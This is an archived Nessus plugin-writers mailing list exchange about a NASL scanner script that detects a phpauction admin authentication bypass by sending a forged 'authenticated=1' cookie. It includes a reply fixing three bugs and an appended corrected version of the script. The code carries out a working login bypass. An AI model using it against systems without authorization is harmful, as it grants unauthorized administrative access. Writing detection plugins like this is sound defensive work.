At 9:59 +0200 15/7/2005, Tobias Glemser wrote:
>.. I tried to write a nasl for a bug in phpauction I found early this
>year (http://www.securityfocus.com/bid/12069), but the nasl doesn't
>work completely.
>
>I sniffed the connection while executing the script and the script
>successfully uses the bypass possibility, moves to every given
>directory, but sadly the script doesn't recognize that it
>successfully logged in.
>
>Maybe some of you guys would be so kind as to have a look at it?
>
>Thanks in advance.
>
>Toby
>
># The script code starts here
>include("http_func.inc");
>include("http_keepalive.inc");
>
>
>port = get_http_port(default:80);
>if(!get_port_state(port))exit(0);
>
>dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin", "auktion/admin", cgi_dirs());
>
>foreach dir (dirs)
>{
>  req = http_get(item:dir +"/admin.php", port:port);
>  res = http_keepalive_send_recv(port:port, data:req);
>  if( res == NULL ) exit(0);
>
>  if( "Passwort " >< res || "Password" >< res )
>  {
>    idx = stridx(req, string("\r\n\r\n"));
>    req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
>    res = http_keepalive_send_recv(port:port, data:req);
>    if("Installation" >< res)
>    {
>      security_hole(port);
>    }
>    exit(0);
>  }
>}
># eof
There are some errors in this script.

(1) The final explicit directory in the list doesn't have a leading /.
Without this the web server will respond with a 400 Bad Request.

(2) The second exit(0) should be inside the if("Installation" >< res),
that is, after the security_hole(port).

(3) Did you mean to include a tab character after Passwort
rather than a space?

Without a vulnerable web server to test against, it's difficult
to know whether there are logic errors.
Dennis.
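Toby's script with the three corrections Dennis lists applied, as an added example rather than code taken from either message. The trailing whitespace after "Passwort" is dropped so the label matches whether a tab or a space follows it; that is an assumption, since neither message settles which character the page emits.

```nasl
include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);

# (1) every explicit entry now starts with "/", so the request line
#     is "GET /auktion/admin/admin.php" instead of an invalid target
dirs = make_list("/phpauction/admin", "/admin", "/auction/admin",
                 "/auktion/admin", cgi_dirs());

foreach dir (dirs)
{
  req = http_get(item:dir + "/admin.php", port:port);
  res = http_keepalive_send_recv(port:port, data:req);
  if (res == NULL) exit(0);

  # (3) match the label without trailing whitespace (assumption: works
  #     for both "Passwort<tab>" and "Passwort ")
  if ("Passwort" >< res || "Password" >< res)
  {
    # replay the same request with the cookie inserted before the
    # blank line that terminates the headers
    idx = stridx(req, string("\r\n\r\n"));
    req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
    res = http_keepalive_send_recv(port:port, data:req);
    if ("Installation" >< res)
    {
      security_hole(port);
      exit(0);   # (2) stop only once the finding has been confirmed
    }
    # no admin page with the cookie: keep trying the remaining dirs
  }
}
```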
_______________________________________________
Plugins-writers mailing list
Plugins-writers@private
http://mail.nessus.org/mailman/listinfo/plugins-writers
This archive was generated by hypermail 2.1.3 : Fri Jul 15 2005 - 14:08:50 PDT